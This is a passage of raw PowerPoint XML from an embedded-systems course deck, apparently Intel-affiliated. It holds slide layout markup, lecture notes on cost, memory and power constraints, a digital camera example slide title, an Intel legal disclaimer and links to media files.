                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{4ECE0C24-D04F-43D3-8A3C-98380CBB9E12}" type="slidenum">
              <a:rPr lang="he-IL">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>287</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264196" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1154671" y="684979"/>
            <a:ext cx="4550213" cy="3429587"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264197" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="915023" y="4342892"/>
            <a:ext cx="5027955" cy="41161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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-3112" y="8685783"/>
            <a:ext cx="2975379" cy="461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Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="730320" indent="-280892">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1123569" indent="-224714">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1572997" indent="-224714">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2022424" indent="-224714">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2471852" indent="-224714" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2921279" indent="-224714" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3370707" indent="-224714" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3820135" indent="-224714" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Konstantin Levit-Gurevich</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266243" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3885733" y="8685783"/>
            <a:ext cx="2975379" cy="461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Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="730320" indent="-280892">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1123569" indent="-224714">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1572997" indent="-224714">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2022424" indent="-224714">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2471852" indent="-224714" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2921279" indent="-224714" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3370707" indent="-224714" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3820135" indent="-224714" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{CF1D8FE9-4497-44B2-8B7E-B825C893BD8F}" type="slidenum">
              <a:rPr lang="he-IL">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>288</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266244" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="684213"/>
            <a:ext cx="4573588" cy="3430587"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266245" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="915023" y="4342892"/>
            <a:ext cx="5027955" cy="41161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7D535D-1033-43C3-960E-8E45BF2A957B}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>346</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>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Explain the equation of cost / volume, the different between the SW cost model. NRE (non-recurring engineering) vs. recurring cost</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Memory and storage space as result of cost constraints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Power consumption – slower clock or clock throttling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Physical constraints may further impact memory size, clock speed, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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1BBB3D61-A89C-4521-9936-147916F1A640}" type="slidenum">
              <a:rPr lang="en-US" sz="1300" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="130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Explain: “only device vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>controls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> SW” – not necessarily </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>writes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Customized OS services or tailored</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5E3708F1-F8A4-4AB9-A846-F18ACD6F08C1}" type="slidenum">
              <a:rPr lang="en-US" sz="1300" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="130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4/24/2013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4/24/2013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4/24/2013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EDF93B-73D1-473B-8906-88F5D704103A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333713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E42D58E-CE96-4E1E-A4B6-9A9574BA6A20}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3464679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0738E57-45CB-408F-8886-7747E2A0C78A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2900187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869950" y="293688"/>
            <a:ext cx="7391400" cy="83661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447800"/>
            <a:ext cx="7654925" cy="2312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62000" y="3913188"/>
            <a:ext cx="7654925" cy="2314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r>
              <a:rPr lang="en-US"/>
              <a:t>Konstantin Levit-Gurevich</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{21ABF670-74B2-4806-A9D1-73CB589E8B63}" type="slidenum">
              <a:rPr lang="he-IL"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3197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4/24/2013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097BEB-3523-47A2-9BCA-F2CBD6B2F747}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/24/2013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097BEB-3523-47A2-9BCA-F2CBD6B2F747}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/24/2013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097BEB-3523-47A2-9BCA-F2CBD6B2F747}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/24/2013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097BEB-3523-47A2-9BCA-F2CBD6B2F747}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/24/2013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97BEB-3523-47A2-9BCA-F2CBD6B2F747}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/24/2013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7BEB-3523-47A2-9BCA-F2CBD6B2F747}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/24/2013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7BEB-3523-47A2-9BCA-F2CBD6B2F747}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/24/2013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97BEB-3523-47A2-9BCA-F2CBD6B2F747}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/24/2013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26D51-B0A0-4BA2-B405-E1E56C53C41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7.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8.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41.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0.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15.vml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.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6.vml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.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54.e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hyperlink" Target="https://computing.llnl.gov/tutorials/pthreads/#ConditionVariabl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en.wikipedia.org/wiki/File:Jtag_chain.svg"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5.emf"/></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70.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide73.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.emf"/><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21.bin"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.e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68.emf"/></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71.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject25.bin"/></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5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing21.vml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.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22.vml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.emf"/></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74.emf"/></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omer.levy@inte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ari.yoskovitz@inte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76.emf"/></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77.emf"/></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26.vml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.emf"/></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79.emf"/></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80.emf"/></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29.vml"/><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30.vml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.emf"/></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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing31.vml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.emf"/></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32.vml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.emf"/></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wmf"/><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image" Target="../media/image90.jpe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96.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject38.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www.embedded.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3.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject7.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34.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject8.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609600" y="228600"/>
            <a:ext cx="8229600" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Legal Disclaimer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411651" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8237538" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>INFORMATION IN THIS DOCUMENT IS PROVIDED IN CONNECTION WITH INTEL® PRODUCTS. NO LICENSE, EXPRESS OR IMPLIED, BY ESTOPPEL OR OTHERWISE, TO ANY INTELLECTUAL PROPERTY RIGHTS IS GRANTED BY THIS DOCUMENT. EXCEPT AS PROVIDED IN INTEL'S TERMS AND CONDITIONS OF SALE FOR SUCH PRODUCTS, INTEL ASSUMES NO LIABILITY WHATSOEVER, AND INTEL DISCLAIMS ANY EXPRESS OR IMPLIED WARRANTY, RELATING TO SALE AND/OR USE OF INTEL PRODUCTS INCLUDING LIABILITY OR WARRANTIES RELATING TO FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, OR INFRINGEMENT OF ANY PATENT, COPYRIGHT OR OTHER INTELLECTUAL PROPERTY RIGHT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>UNLESS OTHERWISE AGREED IN WRITING BY INTEL, THE INTEL PRODUCTS ARE NOT DESIGNED NOR INTENDED FOR ANY APPLICATION IN WHICH THE FAILURE OF THE INTEL PRODUCT COULD CREATE A SITUATION WHERE PERSONAL INJURY OR DEATH MAY OCCUR.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>Intel may make changes to specifications and product descriptions at any time, without notice. Designers must not rely on the absence or characteristics of any features or instructions marked "reserved" or "undefined." Intel reserves these for future definition and shall have no responsibility whatsoever for conflicts or incompatibilities arising from future changes to them. The information here is subject to change without notice. Do not finalize a design with this information. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>The products described in this document may contain design defects or errors known as errata which may cause the product to deviate from published specifications. Current characterized errata are available on request. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>Contact your local Intel sales office or your distributor to obtain the latest specifications and before placing your product order.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>This document contains information on products in the design phase of development. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>All products, platforms, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice. All dates specified are target dates, are provided for planning purposes only and are subject to change.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>This document contains information on products in the design phase of development. Do not finalize a design with this information. Revised information will be published when the product is available. Verify with your local sales office that you have the latest datasheet before finalizing a design.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>Intel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>processor numbers are not a measure of performance. Processor numbers differentiate features within each processor family, not across different processor families. See www.intel.com/products/processor_number for details.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>Intel and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>the Intel logo are trademarks of Intel Corporation in the U.S. and other countries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>*Other names and brands may be claimed as the property of others.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>Copyright © </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>2009, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>Intel Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="287870124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609600"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>Example – a Digital Camera</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="1752600"/>
            <a:ext cx="7923702" cy="4648200"/>
            <a:chOff x="1197" y="1849"/>
            <a:chExt cx="7215" cy="4052"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29700" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8412" y="3564"/>
              <a:ext cx="0" cy="215"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0"/>
              <a:endParaRPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29701" name="Rectangle 5"/>
